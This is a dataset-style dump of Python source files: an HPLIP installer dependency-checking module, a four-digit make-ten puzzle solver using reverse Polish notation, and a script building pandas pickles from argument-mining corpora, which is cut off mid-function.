max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
hplip-3.20.3/installer/dcheck.py | Deril-Pana/wikiBlackcoinNL | 0 | 12765051 | <reponame>Deril-Pana/wikiBlackcoinNL<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (c) Copyright 2003-2015 HP Development Company, L.P.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: <NAME>
#
# Std Lib
import os
import os.path
import re
import sys
from subprocess import Popen, PIPE
import codecs
# Local
from base.g import *
from base import utils, services
from base.sixext import to_bytes_utf8
# Pattern matching a full three-part version string, e.g. "1.2.3".
ver1_pat = re.compile("""(\d+\.\d+\.\d+)""", re.IGNORECASE)
# Looser two-part pattern; NOTE(review): the middle '.' is unescaped, so it
# matches any character (e.g. "1x2") — presumably intended as "\." — confirm.
ver_pat = re.compile("""(\d+.\d+)""", re.IGNORECASE)
# Column indices for process listings (pid, command line).
PID = 0
CMDLINE = 1
# Cached output of 'ldconfig -p' (filled by update_ld_output()).
ld_output = ''
#ps_output = ''
# Cached output of 'lsmod' (filled lazily by check_lsmod()).
mod_output = ''
def update_ld_output():
    """Refresh the module-level cache of 'ldconfig -p' output.

    Used by check_lib() to test for installed shared libraries.
    On failure only a debug message is logged; ld_output stays whatever
    utils.run returned.
    """
    # For library checks
    global ld_output
    # NOTE(review): joining utils.which('ldconfig') with 'ldconfig' assumes
    # which() returns the containing directory, not the full path — confirm
    # against base.utils.which().
    status, ld_output = utils.run('%s -p' % os.path.join(utils.which('ldconfig'), 'ldconfig'), log_output=False)
    if status != 0:
        log.debug("ldconfig failed.")
def check_tool(cmd, min_ver=0.0):
    """Run *cmd* and report whether the tool is present (and new enough).

    cmd     -- shell command, typically '<tool> --version'
    min_ver -- minimum required 'major.minor' version as a float;
               0.0 (falsy) means only check the command succeeds.
    Returns True if the command ran and (when min_ver is given) the first
    output line contains a parsable version >= min_ver; False otherwise.
    """
    log.debug("Checking: %s (min ver=%f)" % (cmd, min_ver))
    status, output = utils.run(cmd)
    if status != 0:
        log.debug("Not found!")
        return False
    else:
        if min_ver:
            # Version is expected on the first line of output.
            try:
                line = output.splitlines()[0]
            except IndexError:
                line = ''
            log.debug(line)
            match_obj = ver_pat.search(line)
            # AttributeError covers a failed search (match_obj is None).
            try:
                ver = match_obj.group(1)
            except AttributeError:
                ver = ''
            try:
                v_f = float(ver)
            except ValueError:
                # No parsable version number -> treat as not satisfying min_ver.
                return False
            else:
                log.debug("Ver=%f Min ver=%f" % (v_f, min_ver))
                if v_f < min_ver:
                    log.debug("Found, but newer version required.")
                return v_f >= min_ver
        else:
            log.debug("Found.")
            return True
def check_lib(lib, min_ver=0):
    """Return True if *lib* appears in the cached 'ldconfig -p' output.

    Requires update_ld_output() to have been called first.
    min_ver is accepted for interface compatibility but is not used.
    """
    log.debug("Checking for library '%s'..." % lib)
    present = lib in ld_output
    if present:
        log.debug("Found.")
        #if min_ver:
        #    pass
        #else:
    else:
        log.debug("Not found.")
    return present
def check_file(f, dir="/usr/include"):
    """Return True if a file matching pattern *f* exists anywhere under *dir*."""
    log.debug("Searching for file '%s' in '%s'..." % (f, dir))
    matches = utils.walkFiles(dir, recurse=True, abs_paths=True, return_folders=False, pattern=f)
    first_hit = next(iter(matches), None)
    if first_hit is not None:
        log.debug("File found at '%s'" % first_hit)
        return True
    log.debug("File not found.")
    return False
def locate_files(f, dir):
    """Return a list of absolute paths under *dir* whose names match pattern *f*.

    Returns an empty list when nothing matches.
    """
    log.debug("Searching for file(s) '%s' in '%s'..." % (f, dir))
    found = []
    for w in utils.walkFiles(dir, recurse=True, abs_paths=True, return_folders=False, pattern=f):
        log.debug(w)
        found.append(w)
    if found:
        log.debug("Found files: %s" % found)
    else:
        # Fixed double negative in the original message ("No files not found.").
        log.debug("No files found.")
    return found
def locate_file_contains(f, dir, s):
    """
    Find a list of files located in a directory
    that contain a specified sub-string.

    f   -- filename pattern to match
    dir -- directory searched recursively
    s   -- sub-string that must appear in the file contents
    Returns the (possibly empty) list of matching absolute paths.
    """
    log.debug("Searching for file(s) '%s' in '%s' that contain '%s'..." % (f, dir, s))
    found = []
    for w in utils.walkFiles(dir, recurse=True, abs_paths=True, return_folders=False, pattern=f):
        if check_file_contains(w, s):
            log.debug(w)
            found.append(w)
    if found:
        log.debug("Found files: %s" % found)
    else:
        # Fixed double negative in the original message ("No files not found.").
        log.debug("No files found.")
    return found
def check_file_contains(f, s):
    """Return True if file *f* contains the sub-string *s*.

    *s* is encoded to UTF-8 bytes and searched line-by-line against the raw
    (binary) file contents. A missing file yields False. The progress
    spinner is always cleaned up, even on exceptions.
    """
    log.debug("Checking file '%s' for contents '%s'..." % (f, s))
    try:
        if os.path.exists(f):
            s = to_bytes_utf8(s)
            # Use a context manager so the handle is closed deterministically;
            # the original 'for a in open(f, "rb")' leaked the file object
            # until garbage collection.
            with open(f, 'rb') as fp:
                for a in fp:
                    update_spinner()
                    if s in a:
                        log.debug("'%s' found in file '%s'." % (s.replace(b'\n', b''), f))
                        return True
        log.debug("Contents not found.")
        return False
    finally:
        cleanup_spinner()
def check_ps(process_list):
    """Return True if any process in *process_list* is currently running.

    process_list -- iterable of process names, or None.
    Returns True on the first name found running, False if none are,
    and (implicitly) None when process_list is None.
    """
    if process_list is not None:
        log.debug("Searching for '%s' in running processes..." % process_list)
        try:
            for p in process_list:
                update_spinner()
                status,process = utils.Is_Process_Running(p)
                if status is True:
                    # NOTE(review): the inner loop rebinds 'p' (the outer loop
                    # variable) to iterate the pid->cmdline mapping.
                    for p in process:
                        log.debug("Found: %s (%s)" % (process[p], p))
                    return True
            log.debug("Not found")
            return False
        finally:
            cleanup_spinner()
def get_ps_pid(process_name_list):
    """Collect the pids of all running processes matching the given names.

    process_name_list -- iterable of process names, or None.
    Returns a dict mapping pid -> process info (as returned by
    utils.Is_Process_Running); empty when nothing matches or input is None.
    """
    processes_list = {}
    if process_name_list is not None:
        log.debug("Searching for '%s' in running processes..." % process_name_list)
        try:
            for p in process_name_list:
                update_spinner()
                status,processes = utils.Is_Process_Running(p)
                if status is True:
                    log.debug("Found: %d processes" % len(processes))
                    for pid in processes:
                        processes_list[pid] =processes[pid]
                else:
                    log.debug("Not found")
        finally:
            cleanup_spinner()
    return processes_list
def check_lsmod(module):
    """Return True if *module* appears in the 'lsmod' kernel-module listing.

    The lsmod output is fetched once and cached in the module-level
    mod_output; subsequent calls reuse the cache.
    """
    global mod_output
    if not mod_output:
        lsmod = utils.which('lsmod')
        # NOTE(review): assumes utils.which() returns the directory containing
        # the binary — confirm against base.utils.which().
        status, mod_output = utils.run(os.path.join(lsmod, 'lsmod'), log_output=False)
    return mod_output.find(module) >= 0
def check_version(inst_ver_str, min_ver_str='0.0'):
    """Compare an installed version string against a minimum version string.

    inst_ver_str -- installed version text; '-' means "not installed"
    min_ver_str  -- minimum required version text; '-' means "no minimum"
    Both strings are reduced to a 'major.minor' float via ver_pat;
    unparsable strings count as 0. Returns True when installed >= minimum.
    """
    log.debug("Checking: installed ver=%s min ver=%s" % (inst_ver_str, min_ver_str))
    # The two identical parse blocks of the original are factored into a helper.
    min_ver = _parse_ver_float(min_ver_str)
    inst_ver = _parse_ver_float(inst_ver_str)
    if inst_ver < min_ver:
        log.debug("Found, but newer version required.")
        return False
    else:
        log.debug("Found.")
        return True


def _parse_ver_float(ver_str):
    """Extract a 'major.minor' float from *ver_str*; '-' or no match -> 0."""
    if ver_str == '-':
        return 0
    match_obj = ver_pat.search(ver_str)
    try:
        ver = match_obj.group(1)
    except AttributeError:
        # search() returned None: no version-like token present.
        ver = ''
    try:
        return float(ver)
    except ValueError:
        return 0
def get_version(cmd,def_ver='-'):
    """Run *cmd* and extract a version string from its first output line.

    Tries the three-part pattern (x.y.z) first, then the two-part one (x.y).
    Returns *def_ver* when the command fails or no version is found.
    """
    log.debug("Checking: %s" % (cmd))
    status, output = utils.run(cmd)
    if status != 0:
        log.debug("Not found!")
        return def_ver
    else:
        try:
            line = output.splitlines()[0]
        except IndexError:
            line = ''
        log.debug(line)
        match_obj = ver1_pat.search(line)
        try:
            ver = match_obj.group(1)
        except AttributeError:
            # No x.y.z match; fall back to the looser x.y pattern.
            match_obj = ver_pat.search(line)
            try:
                ver = match_obj.group(1)
            except AttributeError:
                return def_ver
            else:
                return ver
        else:
            return ver
def get_python_dbus_ver():
    """Return the python-dbus binding version string, or '-' if unavailable."""
    try:
        import dbus
    except ImportError:
        return '-'
    # Newer bindings expose __version__ directly ...
    try:
        return dbus.__version__
    except AttributeError:
        pass
    # ... older ones expose a 'version' tuple instead.
    try:
        return '.'.join([str(part) for part in dbus.version])
    except AttributeError:
        return '-'
def get_pyQt4_version():
    """Return the PyQt4 version string, or '-' when PyQt4 is not installed."""
    log.debug("Checking PyQt 4.x version...")
    ver = '-'
    # PyQt 4
    try:
        import PyQt4
    except ImportError:
        pass
    else:
        from PyQt4 import QtCore
        ver = QtCore.PYQT_VERSION_STR
    return ver
def get_pyQt5_version():
    """Return the PyQt5 version string, or '-' when PyQt5 is not installed."""
    log.debug("Checking PyQt 5.x version...")
    ver = '-'
    # PyQt 5
    try:
        import PyQt5
    except ImportError:
        pass
    else:
        from PyQt5 import QtCore
        ver = QtCore.PYQT_VERSION_STR
    return ver
def get_reportlab_version():
    """Return the installed reportlab version as a string, or '-' if absent."""
    log.debug("Trying to import 'reportlab'...")
    try:
        import reportlab
    except ImportError:
        return '-'
    return str(reportlab.Version)
def get_pyQt_version():
    """Return the PyQt3 version, zero-padded to 'x.y.z', or '-' if absent."""
    log.debug("Checking PyQt 3.x version...")
    # PyQt 3
    try:
        import qt
    except ImportError:
        return '-'
    else:
        #check version of PyQt
        try:
            pyqtVersion = qt.PYQT_VERSION_STR
        except AttributeError:
            # Very old PyQt3 exposed only PYQT_VERSION.
            pyqtVersion = qt.PYQT_VERSION
        # Pad short versions ("3" -> "3.0.0") so callers can rely on x.y.z.
        while pyqtVersion.count('.') < 2:
            pyqtVersion += '.0'
        return pyqtVersion
def get_xsane_version():
    """Return the installed xsane version ('major.minor'), or '-' if not found."""
    installed_ver = '-'
    try:
        # NOTE(review): ">" and "/dev/null" are passed as literal argv entries
        # (no shell), so they do not actually redirect anything — confirm intent.
        p1 = Popen(["xsane", "--version", "2", ">", "/dev/null"], stdout=PIPE)
    except Exception:
        # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit are
        # no longer swallowed; a missing binary raises OSError and lands here.
        output = None
    else:
        output = p1.communicate()[0].decode('utf-8')
    if output:
        xsane_ver_pat = re.compile(r'''xsane-(\d{1,}\.\d{1,}).*''')
        xsane_ver_info = output.splitlines()[0]
        # Search once and reuse the match (the original searched twice).
        match = xsane_ver_pat.search(xsane_ver_info)
        if match:
            installed_ver = match.group(1)
    return installed_ver
def get_pil_version():
    """Return the installed PIL/Pillow version string, or '-' if not importable."""
    try:
        from PIL import Image
    except ImportError:
        return '-'
    # Image.PILLOW_VERSION was deprecated and removed in Pillow 9.0; prefer it
    # for backward compatibility but fall back to the package __version__.
    ver = getattr(Image, 'PILLOW_VERSION', None)
    if ver is None:
        import PIL
        ver = getattr(PIL, '__version__', '-')
    return ver
def get_libpthread_version():
    """Return the glibc version string (name kept for API compatibility).

    Returns '-' when ctypes is unavailable, libc cannot be loaded, or the
    glibc-only gnu_get_libc_version symbol is missing (e.g. musl, macOS).
    """
    try:
        import ctypes, ctypes.util
    except ImportError:
        return '-'
    try:
        # LIBC = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
        libc = ctypes.CDLL(ctypes.util.find_library('c'), ctypes.DEFAULT_MODE, None, True)
        libc.gnu_get_libc_version.restype = ctypes.c_char_p
        # The call returns bytes under Python 3; decode so callers get a str
        # like every other get_*_version helper in this module.
        return libc.gnu_get_libc_version().decode('utf-8')
    except (OSError, AttributeError, TypeError):
        return '-'
def get_python_xml_version():
    """Return the expat XML parser version as a dotted string, or '-' on failure."""
    try:
        import xml.parsers.expat
    except ImportError:
        return '-'
    return '.'.join(str(component) for component in xml.parsers.expat.version_info)
def get_HPLIP_version():
    """Return the HPLIP version string from the global ``prop`` object."""
    return prop.version
def get_libusb_version():
    """Return the libusb version HPLIP was built against.

    Queries 'libusb-config' only for legacy libusb-0.1 builds (per the
    configure-time flag); otherwise assumes libusb-1.0 and returns '1.0'.
    """
    if sys_conf.get('configure', 'libusb01-build', 'no') == "yes":
        return get_version('libusb-config --version')
    else:
        return '1.0'
| 1.773438 | 2 |
solve_v2.py | EliotNapa/urban_hacks | 0 | 12765052 | # -*- coding: utf-8 -*-
"""
"""
import copy
import time
import itertools
class CalcRecord():
    """
    Element container for reverse Polish notation (RPN) evaluation.

    Holds the four operands (a-d), the three operators (op1-op3) and the
    computed value of one candidate expression; ``result`` is -1 until an
    evaluation sets it.
    """
    def __init__(self, a,b,c,d,op1,op2,op3):
        self.a = a
        self.b = b
        self.c = c
        self.d = d
        self.op1 = op1
        self.op2 = op2
        self.op3 = op3
        self.result = -1
    def print(self):
        # Dump all fields on one line: operands, operators, result.
        # (Deliberately shadows the builtin name 'print' as a method name.)
        print("{0} {1} {2} {3} {4} {5} {6} {7}".format(
            self.a,
            self.b,
            self.c,
            self.d,
            self.op1,
            self.op2,
            self.op3,
            self.result
        ))
def main():
    """Enumerate every non-decreasing 4-digit set (0-9) and count how many
    can be combined to make 10; print per-set counts, the number of solvable
    sets and the elapsed time."""
    t1 = time.time()
    exist_count = 0
    # src_list, count = calc_puzle(1, 3, 3, 7, detail_print = True)
    # src_list, count = calc_puzle(4, 6, 7, 9, detail_print = True)
    # if count > 0:
    #     exist_count += 1
    # print("{0} count = {1}".format(src_list, count))
    #
    # Skip duplicate digit multisets by enumerating in non-decreasing order:
    # (1,2,3,1) === (1,1,2,3)
    for a in range(0, 10):
        for b in range(a, 10):
            for c in range(b, 10):
                for d in range(c, 10):
                    src_list, count = calc_puzle(a, b, c, d, detail_print = False)
                    print("{0} count = {1}".format(src_list, count))
                    if count > 0:
                        exist_count += 1
    # "成立個数" = number of solvable digit sets (output string kept as-is).
    print("成立個数:{0}".format(exist_count))
    t2 = time.time()
    # "実行時間" = execution time (output string kept as-is).
    print("実行時間:{0}".format(t2-t1))
def calc_puzle(a,b,c,d, detail_print = False):
    """Count the ways the digits a,b,c,d can make 10 with +, -, *, /.

    Every ordering of the digits is combined with every operator triple and
    evaluated under the four structurally distinct RPN parenthesizations.
    Returns [list-of-digit-strings, number-of-expressions-equal-to-10];
    when detail_print is True each solution is printed via print_formula().
    """
    ans_count = 0
    # Puzzle digits as strings
    src_nums = [str(a), str(b), str(c), str(d)]
    # Operator list
    oprs = ["+", "-", "*", "/"]
    # All orderings of the digits
    permu_list = list(itertools.permutations(src_nums))
    # All operator triples (with repetition)
    op_list= list(itertools.product(oprs, repeat=3))
    # All RPN element permutations
    calc_list = []
    for op_set in op_list:
        for one_line in permu_list:
            calc_list.append(CalcRecord(
                one_line[0],
                one_line[1],
                one_line[2],
                one_line[3],
                op_set[0],
                op_set[1],
                op_set[2]
            ))
    calc_work = []
    # Evaluate the four RPN patterns for every record, using calc_work
    # as the operand stack (exec_revpol pops two, pushes one).
    for cur_calc in calc_list:
        calc_work.clear()
        # RPN pattern 1
        # A B op1 C D op2 op3
        # (A op1 B) op3 (C op2 D)
        calc_work.append(cur_calc.a)
        calc_work.append(cur_calc.b)
        exec_revpol(cur_calc.op1, calc_work)
        calc_work.append(cur_calc.c)
        calc_work.append(cur_calc.d)
        exec_revpol(cur_calc.op2, calc_work)
        exec_revpol(cur_calc.op3, calc_work)
        cur_calc.result = calc_work.pop()
        # print_formula(cur_calc, "F1")
        if 10 == cur_calc.result:
            ans_count += 1
            if detail_print:
                print_formula(cur_calc, "F1")
            # return [src_nums, ans_count]
        calc_work.clear()
        # RPN pattern 2
        # A B op1 C op2 D op3
        # ((A op1 B) op2 C) op3 D
        calc_work.append(cur_calc.a)
        calc_work.append(cur_calc.b)
        exec_revpol(cur_calc.op1, calc_work)
        calc_work.append(cur_calc.c)
        exec_revpol(cur_calc.op2, calc_work)
        calc_work.append(cur_calc.d)
        exec_revpol(cur_calc.op3, calc_work)
        cur_calc.result = calc_work.pop()
        # print_formula(cur_calc, "F2")
        if 10 == cur_calc.result:
            ans_count += 1
            if detail_print:
                print_formula(cur_calc, "F2")
            # return [src_nums, ans_count]
        calc_work.clear()
        # RPN pattern 3
        # A B C op1 op2 D op3
        # (A op2 (B op1 C)) op3 D
        calc_work.append(cur_calc.a)
        calc_work.append(cur_calc.b)
        calc_work.append(cur_calc.c)
        exec_revpol(cur_calc.op1, calc_work)
        exec_revpol(cur_calc.op2, calc_work)
        calc_work.append(cur_calc.d)
        exec_revpol(cur_calc.op3, calc_work)
        cur_calc.result = calc_work.pop()
        # print_formula(cur_calc, "F3")
        if 10 == cur_calc.result:
            ans_count += 1
            if detail_print:
                print_formula(cur_calc, "F3")
            # return [src_nums, ans_count]
        calc_work.clear()
        # RPN pattern 4
        # A B C D op1 op2 op3
        # A op3 (B op2 (C op1 D))
        calc_work.append(cur_calc.a)
        calc_work.append(cur_calc.b)
        calc_work.append(cur_calc.c)
        calc_work.append(cur_calc.d)
        exec_revpol(cur_calc.op1, calc_work)
        exec_revpol(cur_calc.op2, calc_work)
        exec_revpol(cur_calc.op3, calc_work)
        cur_calc.result = calc_work.pop()
        # print_formula(cur_calc, "F4")
        if 10 == cur_calc.result:
            ans_count += 1
            if detail_print:
                print_formula(cur_calc, "F4")
            # return [src_nums, ans_count]
    return [src_nums, ans_count]
def print_formula(cur_calc, msg):
    """
    Print one solved record: the RPN token sequence and its infix rendering.

    cur_calc -- a CalcRecord with result already set
    msg      -- which evaluation pattern produced it ("F1".."F4"); the infix
                string must mirror the evaluation order used in calc_puzle().
    """
    if msg == "F1":
        # A B op1 C D op2 op3
        # (A op1 B) op3 (C op2 D)
        # Fixed: the original format printed ((A op1 B) op2 C) op3 D, which is
        # the F2 shape and contradicted both the comment above and the value
        # actually computed for pattern F1.
        print("{8}# {0} {1} {2} {3} {4} {5} {6}\n({0} {2} {1}) {6} ({3} {5} {4}) = {7}".format(
            cur_calc.a,
            cur_calc.b,
            cur_calc.op1,
            cur_calc.c,
            cur_calc.d,
            cur_calc.op2,
            cur_calc.op3,
            cur_calc.result,
            msg
        ))
    elif msg == "F2":
        # A B op1 C op2 D op3
        # ((A op1 B) op2 C) op3 D
        # Fixed a missing space before '=' in the output.
        print("{8}# {0} {1} {2} {3} {4} {5} {6}\n(({0} {2} {1}) {4} {3}) {6} {5} = {7}".format(
            cur_calc.a,
            cur_calc.b,
            cur_calc.op1,
            cur_calc.c,
            cur_calc.op2,
            cur_calc.d,
            cur_calc.op3,
            cur_calc.result,
            msg
        ))
    elif msg == "F3":
        # A B C op1 op2 D op3
        # (A op2 (B op1 C)) op3 D
        print("{8}# {0} {1} {2} {3} {4} {5} {6}\n({0} {4} ({1} {3} {2})) {6} {5} = {7}".format(
            cur_calc.a,
            cur_calc.b,
            cur_calc.c,
            cur_calc.op1,
            cur_calc.op2,
            cur_calc.d,
            cur_calc.op3,
            cur_calc.result,
            msg
        ))
    else:
        # A B C D op1 op2 op3
        # A op3 (B op2 (C op1 D))
        # Fixed a missing space after the inner operator in the output.
        print("{8}# {0} {1} {2} {3} {4} {5} {6}\n{0} {6} ({1} {5} ({2} {4} {3})) = {7}".format(
            cur_calc.a,
            cur_calc.b,
            cur_calc.c,
            cur_calc.d,
            cur_calc.op1,
            cur_calc.op2,
            cur_calc.op3,
            cur_calc.result,
            msg
        ))
def exec_revpol(op, work_list):
    """
    Execute one reverse Polish notation step.

    op        -- operator, one of "+", "-", "*", "/"
    work_list -- operand stack; the top two entries are popped and the
                 result of <deeper> op <top> is pushed back.

    The sentinel string "∞" marks a previous division by zero; it is
    propagated unchanged, and dividing by zero pushes it instead of raising.
    """
    top = work_list.pop()
    deeper = work_list.pop()
    # Poisoned operands taint the whole expression.
    if deeper == "∞" or top == "∞":
        work_list.append("∞")
        return
    rhs = float(top)
    lhs = float(deeper)
    if op == "+":
        work_list.append(lhs + rhs)
    elif op == "-":
        work_list.append(lhs - rhs)
    elif op == "*":
        work_list.append(lhs * rhs)
    elif op == "/":
        if rhs == 0:
            # Division by zero: push the sentinel instead of raising.
            work_list.append("∞")
        else:
            work_list.append(lhs / rhs)
# Script entry point.
if __name__ == '__main__':
    main()
| 3.703125 | 4 |
dataframe_creator.py | Funny-Panda/StructurePrediction18 | 8 | 12765053 | <filename>dataframe_creator.py
__author__ = "<NAME>"
__copyright__ = "Copyright 2018-2020 <NAME>"
__license__ = "BSD 3-clause"
__version__ = "0.2.0"
__email__ = "<EMAIL>"
"""
Code to create a pandas dataframe from a specific corpus
"""
import os
import pandas
import json
import random
import sys
import ast
import numpy as np
import argparse
def split_propositions(text, propositions_offsets):
    """Slice *text* into propositions given a list of [start, end) offset pairs."""
    return [text[span[0]:span[1]] for span in propositions_offsets]
def create_preprocessed_cdcp_pickle(dataset_path, dataset_version, link_types, dataset_type='train', validation=0, reflexive=False):
    """Build per-proposition-pair pandas pickles from the CDCP corpus.

    Reads numbered .txt/.ann.json document pairs, emits one row per ordered
    (source, target) proposition pair within a document, and writes the rows
    as <dataset_type>.pkl (plus validation.pkl when a validation fraction in
    (0, 1) is given; documents are assigned to validation at random).

    NOTE: indentation of this function was reconstructed from a
    whitespace-mangled dump; counter placement is marked where ambiguous.
    """
    data_path = os.path.join(dataset_path, dataset_version, dataset_type)
    normal_list = []
    validation_list = []
    prop_counter = {}
    rel_counter = {}
    val_prop_counter = {}
    val_rel_counter = {}
    # CDCP document file names are zero-padded 5-digit numbers.
    for i in range(2000):
        file_name = "%05d" % (i)
        text_file_path = os.path.join(data_path, file_name + ".txt")
        if os.path.exists(text_file_path):
            split = dataset_type
            if validation > 0 and validation < 1:
                # Random per-document assignment to the validation split.
                p = random.random()
                if p < validation:
                    split = 'validation'
            text_file = open(text_file_path, 'r')
            labels_file = open(os.path.join(data_path, file_name + ".ann.json"), 'r')
            data = json.load(labels_file)
            raw_text = text_file.read()
            text_file.close()
            labels_file.close()
            propositions = split_propositions(raw_text, data['prop_offsets'])
            if len(data['url'])>0:
                print('URL! ' + str(i))
            num_propositions = len(propositions)
            # Diagnostic: single-proposition documents yield no pairs.
            if (num_propositions <= 1):
                print('YEP!')
            for sourceID in range(num_propositions):
                type1 = data['prop_labels'][sourceID]
                for targetID in range(num_propositions):
                    # Skip self-pairs unless reflexive pairs were requested.
                    if sourceID == targetID and not reflexive:
                        continue
                    relation_type = None
                    relation1to2 = False
                    # relation type
                    for link_type in link_types:
                        links = data[link_type]
                        for link in links:
                            # DEBUG
                            # if not link[0][0] == link[0][1]:
                            #     raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
                            if link[0] == sourceID and link[1] == targetID:
                                if relation_type is not None and not relation_type == link_type:
                                    raise Exception('MORE RELATION FOR THE SAME PROPOSITIONS: document ' + file_name)
                                relation_type = link_type
                                relation1to2 = True
                            elif link[0] == targetID and link[1] == sourceID:
                                # Reverse direction: mark as inverse relation.
                                relation_type = "inv_" + link_type
                    # proposition type
                    type2 = data['prop_labels'][targetID]
                    dataframe_row = {'text_ID': i,
                                     'rawtext': raw_text,
                                     'source_proposition': propositions[sourceID],
                                     'source_ID': str(i) + "_" + str(sourceID),
                                     'target_proposition': propositions[targetID],
                                     'target_ID': str(i) + "_" + str(targetID),
                                     'source_type': type1,
                                     'target_type': type2,
                                     'relation_type': relation_type,
                                     'source_to_target': relation1to2,
                                     'set': split
                                     }
                    if split == 'validation':
                        validation_list.append(dataframe_row)
                        if relation_type not in val_rel_counter.keys():
                            val_rel_counter[relation_type] = 0
                        val_rel_counter[relation_type] += 1
                    else:
                        normal_list.append(dataframe_row)
                        if relation_type not in rel_counter.keys():
                            rel_counter[relation_type] = 0
                        rel_counter[relation_type] += 1
                    # NOTE(review): placement of the type counters (per pair vs.
                    # per source proposition) reconstructed from the mangled
                    # dump — confirm against the original repository.
                    if split == 'validation':
                        if type1 not in val_prop_counter.keys():
                            val_prop_counter[type1] = 0
                        val_prop_counter[type1] += 1
                    else:
                        if type1 not in prop_counter.keys():
                            prop_counter[type1] = 0
                        prop_counter[type1] += 1
    pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
    if not os.path.exists(pickles_path):
        os.makedirs(pickles_path)
    if len(normal_list)>0:
        dataframe = pandas.DataFrame(normal_list)
        # Fix the column order before pickling.
        dataframe = dataframe[['text_ID',
                               'rawtext',
                               'source_proposition',
                               'source_ID',
                               'target_proposition',
                               'target_ID',
                               'source_type',
                               'target_type',
                               'relation_type',
                               'source_to_target',
                               'set']]
        dataframe_path = os.path.join(pickles_path, dataset_type + ".pkl")
        dataframe.to_pickle(dataframe_path)
    if len(validation_list) > 0:
        dataframe = pandas.DataFrame(validation_list)
        dataframe = dataframe[['text_ID',
                               'rawtext',
                               'source_proposition',
                               'source_ID',
                               'target_proposition',
                               'target_ID',
                               'source_type',
                               'target_type',
                               'relation_type',
                               'source_to_target',
                               'set']]
        dataframe_path = os.path.join(pickles_path, 'validation' + ".pkl")
        dataframe.to_pickle(dataframe_path)
    # Summary statistics.
    print("_______________")
    print(dataset_type)
    print(prop_counter)
    print(rel_counter)
    print("_______________")
    print("VALIDATION")
    print(val_prop_counter)
    print(val_rel_counter)
    print("_______________")
def create_scidtb_pickle(dataset_path, dataset_version, documents_path,
                         asymmetric_link_types, symmetric_link_types, a_non_link_types, s_non_link_types,
                         test=0.0, validation=0.0, reflexive=False):
    """Build sentence and sentence-pair pandas pickles from SciDTB .conll files.

    Each .conll document is segmented into sentences using BIO-style labels
    (second column); the label also encodes sentence type, relation type and
    a relative target offset. Documents are randomly assigned to the
    train/validation/test splits according to the given fractions. Writes
    sentences.pkl plus one <split>.pkl of sentence pairs per non-empty split.

    NOTE: indentation of this function was reconstructed from a
    whitespace-mangled dump.
    """
    print()
    # Echo all arguments for reproducibility of a run.
    for key in sorted(locals().keys()):
        print(str(key) + ":\t" + str(locals()[key]))
    token_counter = 0
    sentence_counter = 0
    assert (validation >= 0 and validation <= 1)
    assert (test >= 0 and test <= 1)
    relation_types = []
    relation_types.extend(asymmetric_link_types)
    relation_types.extend(a_non_link_types)
    relation_types.extend(symmetric_link_types)
    relation_types.extend(s_non_link_types)
    row_list_sent = {"train":[], "test":[], "validation":[]}
    row_list = {"train":[], "test":[], "validation":[]}
    rel_count = {"train":{}, "test":{}, "validation":{}}
    prop_count = {"train":{}, "test":{}, "validation":{}}
    link_count = {"train":0, "test":0, "validation":0}
    # NOTE(review): 'data' appears unused below — possibly dead code.
    data = {'prop_labels': {},
            'T_ids': [],
            'propositions': {},
            }
    rows_by_id = {}
    documents_paths_list = []
    documents_names_list = os.listdir(documents_path)
    for document_name in documents_names_list:
        documents_paths_list.append(os.path.join(documents_path, document_name))
    del documents_names_list
    print(str(len(documents_paths_list)) + " documents found for " + documents_path)
    sentences_rows = []
    for document_path in documents_paths_list:
        document_name = os.path.basename(document_path)
        if ".conll" not in document_name:
            continue
        # Document id is the numeric middle chunk of the file name.
        doc_ID = int(document_name.split("-")[1][:])
        split = "train"
        if validation > 0 or test > 0:
            # Random per-document split assignment.
            p = random.random()
            if p < validation:
                split = 'validation'
            elif validation < p < test + validation:
                split = "test"
        original_file = open(document_path, 'r', encoding="utf-8")
        raw_text = original_file.read()
        original_file.close()
        sentence = ""
        current_label = ""
        count = 0
        sent_id = 0
        sent_ids = []
        for line in raw_text.split('\n'):
            if len(line)<5:
                continue
            token_counter += 1
            sentence_splits = line.split()
            text = sentence_splits[0]
            label = sentence_splits[1]
            if label[0] == "B" or sentence == "":
                # if it is the first line
                if len(sentence) > 1:
                    # Finalize the previous sentence: the label encodes
                    # BIO-tag.type.relation.offset; normalize separators so a
                    # negative offset survives the split ("--3" -> ".-3").
                    current_label = current_label.replace("-", ".")
                    current_label = current_label.replace("..", ".-")
                    labels_splits = current_label.split(".")
                    source_type = labels_splits[1]
                    relation_type = labels_splits[2]
                    source_to_target = False
                    target_offset = labels_splits[3]
                    source_id = str(doc_ID) + "_" + str(sent_id)
                    target_id = ""
                    if relation_type in relation_types:
                        target_id = str(doc_ID) + "_" + str(sent_id + int(target_offset))
                    else:
                        relation_type = None
                    if (relation_type in asymmetric_link_types) or (relation_type in symmetric_link_types):
                        source_to_target = True
                    sentences_row = {'text_ID': doc_ID,
                                     'source_ID': source_id,
                                     'target_ID': target_id,
                                     'source_type': source_type,
                                     'relation_type': relation_type,
                                     'source_to_target': source_to_target,
                                     'set': split,
                                     'source_length': count,
                                     'source_proposition': sentence,
                                     }
                    rows_by_id[source_id] = sentences_row
                    sentences_rows.append(sentences_row)
                    sent_ids.append(source_id)
                    sent_id += 1
                sentence = text
                current_label = label
                count = 0
            elif label[0] == "O":
                print("WHAAAT?!? There's a O!!!")
                exit(-4)
            else:
                # Continuation token ("I-" tag): label must match the opener.
                assert current_label[1:] == label[1:]
                sentence += " " + text
                count += 1
        # include last sentence
        if len(sentence) > 1:
            # NOTE(review): duplicated finalization logic (see above) —
